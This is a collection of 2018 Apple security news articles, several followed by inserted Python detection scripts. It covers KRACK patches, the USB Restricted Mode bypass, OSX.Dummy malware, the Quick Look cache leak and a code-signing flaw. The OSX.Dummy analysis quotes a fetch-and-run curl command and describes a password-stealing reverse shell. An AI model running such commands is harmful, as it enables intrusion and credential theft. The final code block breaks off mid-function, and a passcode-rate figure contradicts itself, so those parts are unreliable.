With the release of a Wi-Fi Update for Boot Camp 6.4.0 last week, the Cupertino-based tech giant is addressing a total of three KRACK-related flaws, which are tracked as CVE-2017-13077, CVE-2017-13078, and CVE-2017-13080.

By targeting vulnerable devices, an attacker in Wi-Fi range may force nonce reuse in WPA unicast/PTK clients or in WPA multicast/GTK clients, Apple explains in an advisory.

The software update, the company explains, is available for a broad range of machines running Boot Camp, including MacBook (Late 2009 and later), MacBook Pro (Mid 2010 and later), MacBook Air (Late 2010 and later), Mac mini (Mid 2010 and later), iMac (Late 2009 and later), and Mac Pro (Mid 2010 and later).

“A logic issue existed in the handling of state transitions. This was addressed with improved state management,” Apple noted.

Apple Rolls-Out USB Restricted Mode in iOS
12.7.2018 securityweek  Apple

Apple on Monday released patches for various security vulnerabilities in iOS, macOS, tvOS, watchOS, and Safari, as well as for iCloud and iTunes for Windows.

In addition to fixes for 22 issues, the iOS 11.4.1 software update also introduces the long expected USB Restricted Mode, a feature that should boost the security of its platform and improve privacy.

“Starting with iOS 11.4.1, if you use USB accessories with your iPhone, iPad, or iPod touch, or if you connect your device to a Mac or PC, you might need to unlock your device for it to recognize and use the accessory. Your accessory then remains connected, even if your device is subsequently locked,” Apple says.

The new feature should prevent USB devices connected over the Lightning port from being used to crack the device’s passcode and access user data, if the connection attempt occurs more than one hour after the device was locked.

The new feature can be found in Settings > Face ID (or Touch ID) & Passcode > USB Accessories. Users should leave the toggle disabled to take advantage of USB Restricted Mode.

With the roll-out of this new capability in iOS, it becomes more difficult for forensic analysts to access data on a suspect’s device, as they have only a one-hour window in which to attempt to crack the available protections.

Once it has kicked in, USB Restricted Mode persists through reboots and even if the device software has been restored via Recovery mode, ElcomSoft’s Oleg Afonin explains.

However, it is possible to reset the USB Restricted Mode countdown timer if an untrusted USB accessory is connected to the device within the first hour.

The 22 vulnerabilities addressed with the release of iOS 11.4.1 impact CFNetwork, Emoji, Kernel, libxpc, LinkPresentation, WebKit, WebKit Page Loading, and Wi-Fi. WebKit was impacted the most, with 14 vulnerabilities addressed in it.

The addressed issues include unexpected persistence of cookies in Safari, denial of service, elevation of privileges, access to restricted memory, address bar spoofing, arbitrary code execution, unexpected Safari crashes, exfiltration of audio data cross-origin, and sandbox escape.

The new iOS release is available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.

Apple also patched 11 security flaws with the release of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, and Security Update 2018-004 El Capitan. The bugs impact AMD, APFS, ATS, CFNetwork, CoreCrypto, DesktopServices, IOGraphics, Kernel, libxpc, and LinkPresentation.

The most important of the issues is CVE-2018-3665, a vulnerability that impacts Intel processors. Dubbed LazyFP and detailed last month, the bug is similar to Meltdown Variant 3a and could be exploited to access floating point unit (FPU) state data, which can contain sensitive information, such as cryptographic keys.

“Systems using Intel Core-based microprocessors may potentially allow a local process to infer data utilizing Lazy FP state restore from another process through a speculative execution side channel,” Apple notes.

The newly released watchOS 4.3.2 resolves a total of 14 vulnerabilities, while tvOS 11.4.1 addresses 18. Apple resolved 16 flaws with the release of Safari 11.1.2, and patched 14 bugs in both iCloud for Windows 7.6 and iTunes 12.8 for Windows.

Just using a $39 device it is possible to defeat new iOS USB Restricted Mode
11.7.2018 securityaffairs Apple

Once USB Restricted Mode is enabled on a device, no data communications occur over the Lightning port, but experts found a way to reset the countdown timer.
Recently Apple released the iOS 11.4.1 that introduced a new security feature, dubbed USB Restricted Mode, designed to protect your devices against USB accessories used by forensics experts and law enforcement agencies to analyze iPhone or iPad.

USB Restricted Mode was implemented in the latest beta versions of the iOS operating system; it disables the data connection of the iPhone’s Lightning port after a specific interval of time but does not interrupt the charging process.

Forensic hardware such as the devices manufactured by Cellebrite and Grayshift will not be able to attempt brute-force attacks via the Lightning port.

Apple USB Restricted Mode feature

While Apple proudly announced its new feature, experts from ElcomSoft have found a way to reset the countdown timer of USB Restricted Mode and bypass the defense mechanism.

The researchers discovered that directly connecting a USB accessory to the iOS device within an hour after it was last unlocked resets the one-hour countdown.

Apple’s own $39 Lightning to USB 3 Camera Adapter could be used to bypass the security feature; the experts also discovered that it is possible to bypass USB Restricted Mode using untrusted Lightning accessories, i.e., ones that have never been paired with the iPhone.

“What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all).” reads the post published by ElcomSoft.

“In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.”

USB Restricted Mode

ElcomSoft researchers are also testing unofficial, cheap Lightning to USB adapters to see whether they bypass the security measure.

According to the experts, the issue could easily be fixed by Apple; it is probably nothing more than an oversight.

The new feature can be enabled from Settings > Face ID (or Touch ID) & Passcode > USB Accessories, by leaving the toggle disabled.

In case you need to immediately activate the feature on the iOS device before the countdown timer ends, just press the Power button five times.

New macOS Malware Targets Crypto-Currency Users
4.7.2018 securityweek Apple

A new piece of macOS malware has been observed being distributed via crypto-currency related Slack or Discord chat groups, security researchers warn.

First detailed late last month, the malware is being distributed by malicious actors who impersonate admins or key people. The actors share small snippets of code with the members of said chat groups, and attempt to convince them into running the code in a terminal.

Upon execution of the code, a malicious binary is downloaded and executed on the victim’s machine. Although the social engineering trick isn’t particularly sophisticated, some users apparently fall for it.

The downloaded payload is rather large, at 34MB. As of Friday, the malware wasn’t being detected by any of the 60 anti-virus engines in VirusTotal, Remco Verhoef, ISC Handler and Founder of DutchSec, explains.

The malicious binary is not signed and Gatekeeper would normally flag and block it, but it appears that Apple’s protection measure does not work for files that are executed directly via terminal commands.

The reason the binary is so large is that the author apparently packed in it libraries such as OpenSSL and V8, Objective-See’s Patrick Wardle, who named the malware OSX.Dummy, points out.

When executed on the target machine, the malware first sets the script to be owned as root. When the threat executes sudo to change the file’s permissions, the user is prompted to enter their password in the terminal, and the malware steals it and saves it to /tmp/dumpdummy.

Next, OSX.Dummy sets the script to be executable via chmod +x, moves the script to a new directory, dumps a plist file to /tmp/com.startup.plist and then moves it to the LaunchDaemons directory, sets the owner of the file to root, and then launches the plist launch daemon, for persistence.

At this point, the malware has ensured that the malicious script is automatically executed by the OS whenever the system is rebooted.

The Python script, the security researchers discovered, attempts to connect to 185.243.115[.]230 on port 1337, then “duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell,” Wardle notes.

Once the connection to the remote command and control (C&C) server is established, the attacker can execute arbitrary commands on the infected machine, as root.

The malware’s capabilities, however, are limited, and every step of the infection process is rather trivial to detect, Wardle says.

Recently discovered OSX.Dummy mac malware is targeting the cryptocurrency community
30.6.2018 securityaffairs Apple

The former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new mac malware dubbed OSX.Dummy that targets the cryptocurrency community.
The popular expert decided to analyze the malicious code after security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to the SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

Wardle's intent was to demonstrate that Objective-See’s tools can generically thwart this new threat even though it was undetected by all antivirus software.

OSX.Dummy malware

Verhoef noticed that the attacks originated within crypto-related Slack or Discord chat groups, with the attackers impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noted that the malicious binary is not signed, which means Gatekeeper would block it, but the attackers worked around this limitation by having victims download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets the script to be owned by root:

# procInfo

monitoring for process events...

process start:
pid: 432
path: /usr/bin/sudo
args: (
It then changes the file’s permissions to root by executing the sudo command, which requires the user to enter their password in the terminal.

The malicious code saves the password to /tmp/dumpdummy.

The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.

The malware sets the RunAtLoad key to true, which means the value of the Program key, /var/root/script.sh, will be executed automatically by the OS whenever the system is rebooted.
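Both persistence mechanisms described on this page, Calisto's .plist dropped into /Library/LaunchAgents/ and OSX.Dummy's com.startup.plist in LaunchDaemons with RunAtLoad set to true and Program pointing at /var/root/script.sh, leave the same kind of artifact: a launchd property list that runs a script from a scratch location at every boot or login. The audit below is an added example, not code from Wardle, Kaspersky or either malware family. The launchd directories are real macOS paths; the "scratch location" prefixes, the script suffixes, and the two sample plists (the Label values are made up, the keys of the first one come from the article) are constructed for the example.

```python
import os
import plistlib
import tempfile

# Directories launchd scans for persistent jobs (real macOS paths).
LAUNCH_DIRS = (
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
)

# Heuristics constructed for this example: legitimate launch items very rarely
# run a program out of a scratch location or run a bare shell/python script.
SCRATCH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/root/", "/Users/Shared/")
SCRIPT_SUFFIXES = (".sh", ".py", ".pl", ".command")


def program_of(job: dict):
    """The executable a launchd job runs: the Program key, else ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments")
    return args[0] if args else None


def assess_job(job: dict) -> list:
    """Return the reasons a parsed launchd job looks like malware persistence
    (an empty list means nothing notable)."""
    prog = program_of(job)
    if prog is None:
        return ["no Program/ProgramArguments key"]
    reasons = []
    if prog.startswith(SCRATCH_PREFIXES):
        reasons.append("program lives in a scratch location: " + prog)
    if prog.lower().endswith(SCRIPT_SUFFIXES):
        reasons.append("program is a plain script: " + os.path.basename(prog))
    # RunAtLoad alone is normal; it only adds weight once something else is off.
    if reasons and job.get("RunAtLoad") is True:
        reasons.append("RunAtLoad=true, so it runs at every boot/login")
    return reasons


def scan_dir(path: str) -> dict:
    """Map each flagged .plist in `path` to its reasons; unreadable files are flagged too."""
    findings = {}
    if not os.path.isdir(path):
        return findings
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        full = os.path.join(path, name)
        try:
            with open(full, "rb") as fh:
                job = plistlib.load(fh)      # handles XML and binary plists
        except Exception as exc:            # report a broken plist rather than crash
            findings[name] = ["unparseable plist: %s" % exc]
            continue
        reasons = assess_job(job)
        if reasons:
            findings[name] = reasons
    return findings


def scan_system() -> dict:
    """Scan the real launchd directories (run this on the Mac being checked)."""
    return {d: scan_dir(d) for d in LAUNCH_DIRS}


def demo() -> dict:
    """Write two constructed plists to a temp dir and scan them: one shaped like
    OSX.Dummy's com.startup.plist and one shaped like an ordinary vendor updater."""
    tmp = tempfile.mkdtemp(prefix="launchd-audit-")
    dummy = {"Label": "com.startup", "Program": "/var/root/script.sh", "RunAtLoad": True}
    benign = {"Label": "com.example.updater",
              "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
              "RunAtLoad": True, "StartInterval": 3600}
    for name, job in (("com.startup.plist", dummy), ("com.example.updater.plist", benign)):
        with open(os.path.join(tmp, name), "wb") as fh:
            plistlib.dump(job, fh)
    return scan_dir(tmp)


if __name__ == "__main__":
    for plist, reasons in demo().items():
        print(plist, "->", "; ".join(reasons))
```

The benign updater also has RunAtLoad set, which is why that key is only reported once the program path itself is suspicious; otherwise the scan would flag most legitimate launch items.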

The script will attempt to connect to 185[.]243.115.230 on port 1337.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects to the C&C server, the attacker will be able to execute arbitrary commands as root on the target system.
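The reverse shell described in both OSX.Dummy write-ups has a recognisable shape from the outside: a shell process whose stdin, stdout and stderr have all been duplicated onto one connected socket. The detector below is an added example, not Wardle's code or the malware's script. The pure check is exercised on constructed descriptor tables; the live scan reads /proc, so it only runs on Linux (an equivalent on macOS would have to go through lsof, which is not implemented here).

```python
import os
import re

SOCKET_RE = re.compile(r"^socket:\[\d+\]$")      # Linux readlink form of a socket fd
SHELL_NAMES = {"sh", "bash", "zsh", "dash", "ksh"}


def stdio_on_socket(fd_targets: dict) -> bool:
    """fd_targets maps fd number -> what it points to (readlink result).
    True when descriptors 0, 1 and 2 all point at one and the same socket,
    which is exactly what dup2()-ing a connected socket over stdio produces."""
    targets = [fd_targets.get(fd) for fd in (0, 1, 2)]
    if any(t is None for t in targets):
        return False
    return len(set(targets)) == 1 and SOCKET_RE.match(targets[0]) is not None


def classify(comm: str, fd_targets: dict):
    """Return a finding string, or None. The -i flag is not visible through
    the descriptor table, so the heuristic is: a shell binary whose stdio is
    a socket. Network daemons that are not shells are left alone."""
    if comm in SHELL_NAMES and stdio_on_socket(fd_targets):
        return "%s with stdin/stdout/stderr bound to %s (reverse/bind shell pattern)" % (
            comm, fd_targets[0])
    return None


def read_fd_targets(pid: int) -> dict:
    """Read /proc/<pid>/fd on Linux (assumption: procfs is available)."""
    fd_dir = "/proc/%d/fd" % pid
    targets = {}
    for name in os.listdir(fd_dir):
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except (OSError, ValueError):
            continue
    return targets


def scan_processes() -> list:
    """Walk /proc and return [(pid, finding)] for processes matching the pattern."""
    findings = []
    if not os.path.isdir("/proc"):
        return findings
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open("/proc/%d/comm" % pid) as fh:
                comm = fh.read().strip()
            fds = read_fd_targets(pid)
        except OSError:          # process exited, or not ours to inspect
            continue
        finding = classify(comm, fds)
        if finding:
            findings.append((pid, finding))
    return findings


# Constructed descriptor tables for the three cases that matter.
REVERSE_SHELL_FDS = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]",
                     255: "/var/root/script.sh"}
TERMINAL_SHELL_FDS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}
DAEMON_FDS = {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[900]"}

if __name__ == "__main__":
    for label, fds in (("reverse shell", REVERSE_SHELL_FDS), ("terminal shell", TERMINAL_SHELL_FDS)):
        print(label, "->", classify("sh", fds))
    print("live scan:", scan_processes())
```

A firewall such as the one Wardle mentions catches the outbound connection; this check catches the other half of the pattern, the shell sitting on the socket, and works after the connection has already been made.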

Below are the key findings of Wardle's analysis of OSX.Dummy:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
…and finally, the malware saves the user’s password to
“To check if you’re infected run KnockKnock as root (since the malware sets its components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh’” Wardle concluded.

A hacker devised a method to unlock any iPhone and iPad device
25.6.2018 securityaffairs Apple

A security researcher has devised a method to brute force a passcode on every Apple iPhone or iPad, even the up-to-date ones.
Since iOS 8 rolled out in 2014, iPhone and iPad devices have been protected with encryption; without the passcode it is practically impossible to unlock the device.

If a wrong passcode is entered more than 10 times, the Apple device is wiped.

Now the security researcher Matthew Hickey, co-founder of Hacker House, devised a technique to bypass the limitation of the number of wrong passcodes, even on the latest iOS version (iOS 11.3).

Hacker Fantastic
Apple IOS <= 12 Erase Data bypass, tested heavily with iOS11, brute force 4/6digit PIN's without limits (complex passwords YMMV) https://vimeo.com/276506763 - demo of the exploit in action.

9:16 PM - Jun 22, 2018
Newer Apple devices implement a hardware-based component, isolated from the main processor, that provides an extra layer of security; it also keeps count of the number of wrong passcodes entered and gets slower at responding with each failed attempt.

Hickey explained that when an iPhone or iPad is plugged in, every keyboard input is managed by the device with the highest priority over other processes on the device.

“If you send your brute-force attack in one long string of inputs, it’ll process all of them, and bypass the erase data feature,” he told ZDNet.

If the attacker sends all the passcodes in one single string, enumerating each code from 0000 to 9999 with no spaces, iOS gives the keyboard input routine priority over the device’s data-erasing feature. This implies that the trick works only after the device has booted up, because more routines are running then.

The attack technique devised by Hickey can be effective against devices protected with six-digit passcodes, but it is slow: at roughly three to five seconds per passcode, or a little over a hundred four-digit codes per hour, it would take weeks to unlock a device.

Hickey reported the bug to Apple but has not yet received any reply; he also published a video PoC of his attack.

“I suspect others will find it — or have already found it,” Hickey said.

Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its devices; it locks down the iPhone’s data port to prevent unauthorized access, and experts observed that this also renders the password-cracking tools used by forensic experts ineffective.

macOS' Quick Look Cache May Leak Encrypted Data
21.6.2018 securityweek  Apple

The Quick Look mechanism on macOS, which allows users to check file contents without actually opening the files, may leak information on cached files, even if they reside on encrypted drives or if the files have been deleted.

According to Apple, “Quick Look enables apps like Finder and Mail to display thumbnail images and full-size previews of Keynote, Numbers, Pages, and PDF documents, as well as images and other types of files.”

Quick Look registers the com.apple.quicklook.ThumbnailsAgent XPC service, which creates a thumbnails database and stores it in the /var/folders/.../C/com.apple.QuickLook.thumbnailcache/ directory.

The issue, discovered by Wojciech Reguła, is that the service creates thumbnails of all supported files located in an accessed folder, regardless of whether the folder resides on an internal or external drive. It does the same for macOS Encrypted HFS+/APFS drives as well.

Because of that, the SQLite database in the com.apple.QuickLook.thumbnailcache/ directory contains previews, metadata and file paths of photos and other files in the accessed folders, depending on the file type and the installed Quick Look plugins.

Said thumbnails, however, are not created only for the files a user has chosen to preview with Quick Look (which automatically results in the service caching file information), but for other files residing in the accessed folders as well.

Thumbnails for files that were explicitly previewed are larger, while smaller ones are created for the other files, but even those could be used to leak content, Objective-See’s Patrick Wardle suggests.

To demonstrate the bug, Reguła created a VeraCrypt container, mounted it, and saved an image in it. He also cached it in Quick Look by pressing the space bar on it. Next, he placed a second photo on a macOS Encrypted HFS+/APFS drive.

With both images cached, the full paths and file names were stored in the aforementioned database, and the researcher used a modified script to exfiltrate the thumbnails.data file and recover the thumbnails.

“This technique is known and helps a lot in forensics, but I honestly didn't know about this before. It was the big surprise for me to see that even files stored in encrypted containers may be that cached. Have it on mind when you will be using space to preview photos,” Reguła notes.

According to Wardle, this behavior “can be replicated in a password-protected encrypted APFS container.” When a file is created in the container, a thumbnail is created and cached even if the user merely views the container in the UI without previewing the file, he explains.

Even if the encrypted volume is unmounted, the thumbnail of the file continues to be stored in the temporary directory, meaning that it can be extracted. The cached thumbnails are created for files on USB drives that users insert into their Macs as well.

“Depending on the size of the 'preview' images generated for Finder (and other variables, such as the size of the font used in the file), the contents of even documents may be discernible from the thumbnail alone,” Wardle notes.

With the main drive encrypted, the cached data is safe while the system is powered off, but it can be retrieved by an attacker or by law enforcement with access to the running system, even after the password-protected encrypted containers have been unmounted.

However, it is possible to clear the Quick Look cache when unmounting a container, using the qlmanage utility. The qlmanage -r cache command should immediately purge the cache, without requiring a system reboot.
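As an added example that is not part of the article or the researchers' scripts, this Python audit lists which files under a given mount point (for instance an encrypted container that has since been unmounted) still have thumbnails in the Quick Look cache, then purges the cache with the qlmanage -r cache command mentioned above. The index.sqlite file name, the files/thumbnails table columns, and getconf DARWIN_USER_CACHE_DIR as the way to locate the cache directory are my assumptions; the sample database is constructed.

```python
import sqlite3
import subprocess
from pathlib import Path
from typing import List, Tuple

# Assumed layout of the Quick Look thumbnail cache (not stated in the article):
#   $(getconf DARWIN_USER_CACHE_DIR)/com.apple.QuickLook.thumbnailcache/index.sqlite
# with a `files` table (folder, file_name) and a `thumbnails` table whose rows
# reference files.rowid via file_id and point into thumbnails.data via
# bitmapdata_location / bitmapdata_length.
CACHE_SUBDIR = "com.apple.QuickLook.thumbnailcache"


def default_cache_dir() -> Path:
    """Resolve the per-user cache directory with getconf (macOS only)."""
    out = subprocess.run(["getconf", "DARWIN_USER_CACHE_DIR"],
                         capture_output=True, text=True, check=True).stdout
    return Path(out.strip()) / CACHE_SUBDIR


def open_index(cache_dir: Path) -> sqlite3.Connection:
    """Open index.sqlite read-only so the audit itself never touches the cache."""
    return sqlite3.connect(f"file:{cache_dir / 'index.sqlite'}?mode=ro", uri=True)


def cached_entries_under(conn: sqlite3.Connection,
                         mount_point: str) -> List[Tuple[str, str, int, int]]:
    """Return (folder, file_name, thumbnail_size, cached_bytes) for every
    thumbnail whose source file lives under mount_point, e.g. /Volumes/Secret.
    A non-empty result for an unmounted encrypted volume is exactly the leak
    the article describes."""
    root = mount_point.rstrip("/")
    rows = conn.execute(
        """SELECT f.folder, f.file_name, t.size, t.bitmapdata_length
           FROM files AS f JOIN thumbnails AS t ON t.file_id = f.rowid
           WHERE f.folder = ? OR f.folder LIKE ?
           ORDER BY f.folder, f.file_name""",
        (root, root + "/%"),
    ).fetchall()
    return [tuple(r) for r in rows]


def purge_cache(dry_run: bool = False) -> List[str]:
    """Purge the whole Quick Look cache; the article notes no reboot is needed."""
    cmd = ["qlmanage", "-r", "cache"]
    if not dry_run:
        subprocess.run(cmd, check=True)
    return cmd


def build_sample_index() -> sqlite3.Connection:
    """Constructed in-memory database in the assumed schema, for offline use."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE files (folder TEXT, file_name TEXT);
        CREATE TABLE thumbnails (file_id INTEGER, size INTEGER,
            bitmapdata_location INTEGER, bitmapdata_length INTEGER);
    """)
    conn.executemany("INSERT INTO files VALUES (?, ?)", [
        ("/Volumes/Secret", "contract.pdf"),          # inside encrypted container
        ("/Volumes/Secret/photos", "id-card.jpg"),    # previewed with the space bar
        ("/Users/alice/Pictures", "cat.jpg"),         # internal drive, unrelated
    ])
    conn.executemany("INSERT INTO thumbnails VALUES (?, ?, ?, ?)", [
        (1, 64, 0, 6000), (2, 256, 6000, 40000), (3, 64, 46000, 6000),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    import sys
    mount = sys.argv[1] if len(sys.argv) > 1 else "/Volumes/Secret"
    with open_index(default_cache_dir()) as conn:
        for folder, name, size, nbytes in cached_entries_under(conn, mount):
            print(f"{folder}/{name}: {size}px thumbnail, {nbytes} bytes in thumbnails.data")
    print("purging cache:", " ".join(purge_cache()))
```

Run it after unmounting the container to confirm nothing from it survives in the cache once the purge has completed.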

Apple USB Restricted Mode feature will make it hard for law enforcement to crack devices
18.6.2018 securityaffairs Apple

Apple introduced a new feature, dubbed USB Restricted Mode, in the latest beta versions of iOS to improve the security of a locked device. It locks down the iPhone’s data port to prevent unauthorized access, but experts observed that it will also render the password-cracking tools used by forensics experts ineffective.

USB Restricted Mode was implemented in the latest beta versions of the iOS operating system; it disables the data connection of the iPhone’s Lightning port after a set interval of time without interrupting charging.

Any further data transfer requires the user to provide the passcode.

Initially, the USB Restricted Mode required a passcode after 7 days.

“The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.” reads a blog post published by ElcomSoft.

Last week Apple provided an update on the new feature confirming that it will require a passcode every hour for the data transfers to continue.

“Apple said it was planning an iPhone software update that would effectively disable the phone’s charging and data port — the opening where users plug in headphones, power cables and adapters — an hour after the phone is locked.” reported the New York Times.

“While a phone can still be charged, a person would first need to enter the phone’s password to transfer data to or from the device using the port.”


The new feature will have a significant impact on forensics investigation conducted using cracking tools such as Cellebrite and Grayshift’s Graykey.

Brute-force attacks against the six-digit passcodes that protect Apple devices are time-consuming; cracking a device can take up to 22 hours.

The USB restricted mode that is enabled by default in the iOS 11.4.1 and iOS 12 betas will interfere with forensics tools.

The new feature can, however, be disabled manually.

Experts highlighted that the new feature will also impact the vendors of iPhone peripherals.

Apple Steps Up Encryption to Thwart Police Cracking of iPhones
14.6.2018 securityweek Apple  

Apple said Wednesday it was strengthening encryption on its iPhones to thwart police efforts to unlock handsets without legitimate authorization.

The move by Apple, the latest in an ongoing clash with law enforcement, comes amid reports of growing use of a tool known as GrayKey which can enable police to bypass iPhone security features.

Apple said the new features are not designed to frustrate law enforcement but prevent any bypassing of encryption by good or bad actors.

"At Apple, we put the customer at the center of everything we design," the company said in a statement.

"We're constantly strengthening the security protections in every Apple product to help customers defend against hackers, identity thieves and intrusions into their personal data. We have the greatest respect for law enforcement, and we don't design our security improvements to frustrate their efforts to do their jobs."

Apple said it was working on a fix to mitigate the possibility of accessing data with GrayKey or similar tools.

Apple said that it has a team that responds to law enforcement and national security requests 24 hours a day. But the company has been a target of some in law enforcement for rejecting efforts to allow easy access to iPhones.

Two years ago, Apple went to court to block an FBI effort to force it to weaken iPhone encryption on the device of a mass shooter in San Bernardino, California, but officials dropped the case after finding a tool to unlock the phone.

Code Signing Flaw Affects all Mac OS Versions Since 2005
12.6.2018 securityweek  Apple

Okta Rex (Research and Exploitation) researcher Josh Pitts has discovered a method of exploiting the code signing mechanism in MacOS. If exploited, the flaw could allow malicious untrusted code to masquerade as legitimate trusted code and bypass checks by other security software.

Code signing attacks are not new. However, writes Pitts in public disclosure published today, "Unlike some of the prior work, this current vulnerability does not require admin access, does not require JIT’ing code, or memory corruption to bypass code signing checks. All that is required is a properly formatted Fat/Universal file and code signing checks return valid." Any Mac operating system since the 2005 introduction of OS X Leopard is vulnerable to this flaw.

Code signing works by cryptographically confirming that new code is authentic and not malicious code authored by a bad actor impersonating the original developer. While almost anything, from binaries to PowerShell scripts, can be signed on Windows, on MacOS code signing focuses on the Mach-O binary and application bundles to ensure only trusted code is executed in memory.

"Security, incident response, and forensics processes and personnel use code signing to weed out trusted code from untrusted code," explains Pitts. "By verifying signed code, detection and response personnel can speed up investigations by separating trusted code from untrusted code."

Pitts discovered, however, that the code signing mechanism in MacOS can be manipulated. All it requires is access to a genuinely signed Fat/Universal file. The other conditions are that the first Mach-O in the file must be validly signed by Apple; that the added malicious code must be ad hoc signed and compiled for i386 on an x86_64 target macOS; and that the CPU_TYPE in the Fat header must be set to an invalid type, or to a CPU type that is not native to the host chipset.

Okta Rex told SecurityWeek that this technique bypasses the gamut of whitelisting, incident response, and process inspection solutions by appearing to be signed by Apple's own root certificate.

The simple explanation is that the mechanism accepts the Apple signing, but skips this code and executes the malicious code. "By setting the CPU_Type to an invalid type or valid not native CPU type (example: PPC), the Mach-O loader will skip over the validly signed Mach-O binary and execute the malicious (non-Apple signed) code," writes the researcher.

In effect, the good code is skipped because its CPU_TYPE is wrong, while the subsequent malicious code is run because the code signing API prefers the native CPU architecture (x86_64) when performing its checks and defaults to checking the unsigned code if it is x86_64.
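The condition described above, a fat_arch entry whose declared CPU_TYPE is invalid or does not match the Mach-O header it points at, can be checked directly by parsing the Fat header. The following consistency checker is an added example, not Okta Rex's proof of concept or Apple's code; the sample fat file it builds contains only Mach-O headers (no code) and is constructed for the test.

```python
import struct
from typing import List, NamedTuple, Optional

FAT_MAGIC = 0xCAFEBABE                              # fat header is always big-endian
MH_MAGIC, MH_CIGAM = 0xFEEDFACE, 0xCEFAEDFE         # 32-bit Mach-O (native / byte-swapped)
MH_MAGIC_64, MH_CIGAM_64 = 0xFEEDFACF, 0xCFFAEDFE   # 64-bit Mach-O

CPU_TYPE_X86 = 0x00000007
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_POWERPC = 0x00000012
CPU_TYPE_ARM64 = 0x0100000C
KNOWN_CPU_TYPES = {CPU_TYPE_X86, CPU_TYPE_X86_64, CPU_TYPE_POWERPC, CPU_TYPE_ARM64}


class Slice(NamedTuple):
    declared_cputype: int            # cputype in the fat_arch entry
    actual_cputype: Optional[int]    # cputype in the embedded mach_header, if any
    offset: int
    size: int


def parse_fat(data: bytes) -> List[Slice]:
    """Walk the fat_arch table and read each slice's own Mach-O header."""
    magic, nfat = struct.unpack_from(">II", data, 0)
    if magic != FAT_MAGIC:
        raise ValueError("not a fat/universal binary")
    slices = []
    for i in range(nfat):
        cputype, _sub, offset, size, _align = struct.unpack_from(">5I", data, 8 + 20 * i)
        actual = None
        if offset + 8 <= len(data):
            mh_magic = struct.unpack_from(">I", data, offset)[0]
            if mh_magic in (MH_MAGIC, MH_MAGIC_64):       # big-endian slice (e.g. PPC)
                actual = struct.unpack_from(">I", data, offset + 4)[0]
            elif mh_magic in (MH_CIGAM, MH_CIGAM_64):     # little-endian slice (x86)
                actual = struct.unpack_from("<I", data, offset + 4)[0]
        slices.append(Slice(cputype, actual, offset, size))
    return slices


def audit_fat(data: bytes) -> List[str]:
    """Return findings; an empty list means every fat_arch entry is consistent.
    A fat header that declares an invalid or non-native type for a slice whose
    own header says x86_64 is the precondition the article describes."""
    findings = []
    for i, s in enumerate(parse_fat(data)):
        if s.declared_cputype not in KNOWN_CPU_TYPES:
            findings.append(f"slice {i}: unknown cputype 0x{s.declared_cputype:08x} in fat header")
        if s.actual_cputype is None:
            findings.append(f"slice {i}: no Mach-O header at offset {s.offset}")
        elif s.actual_cputype != s.declared_cputype:
            findings.append(f"slice {i}: fat header says 0x{s.declared_cputype:08x} "
                            f"but Mach-O header says 0x{s.actual_cputype:08x}")
    return findings


def build_sample(first_declared: int) -> bytes:
    """Constructed two-slice fat file containing only Mach-O headers (no code):
    slice 0 is an x86_64 header whose fat_arch entry declares `first_declared`,
    slice 1 is an i386 header declared correctly as i386."""
    hdr0 = struct.pack("<8I", MH_MAGIC_64, CPU_TYPE_X86_64, 3, 2, 0, 0, 0, 0)
    hdr1 = struct.pack("<7I", MH_MAGIC, CPU_TYPE_X86, 3, 2, 0, 0, 0)
    off0, off1 = 4096, 8192
    fat = struct.pack(">II", FAT_MAGIC, 2)
    fat += struct.pack(">5I", first_declared, 3, off0, len(hdr0), 12)
    fat += struct.pack(">5I", CPU_TYPE_X86, 3, off1, len(hdr1), 12)
    buf = bytearray(off1 + len(hdr1))
    buf[:len(fat)] = fat
    buf[off0:off0 + len(hdr0)] = hdr0
    buf[off1:off1 + len(hdr1)] = hdr1
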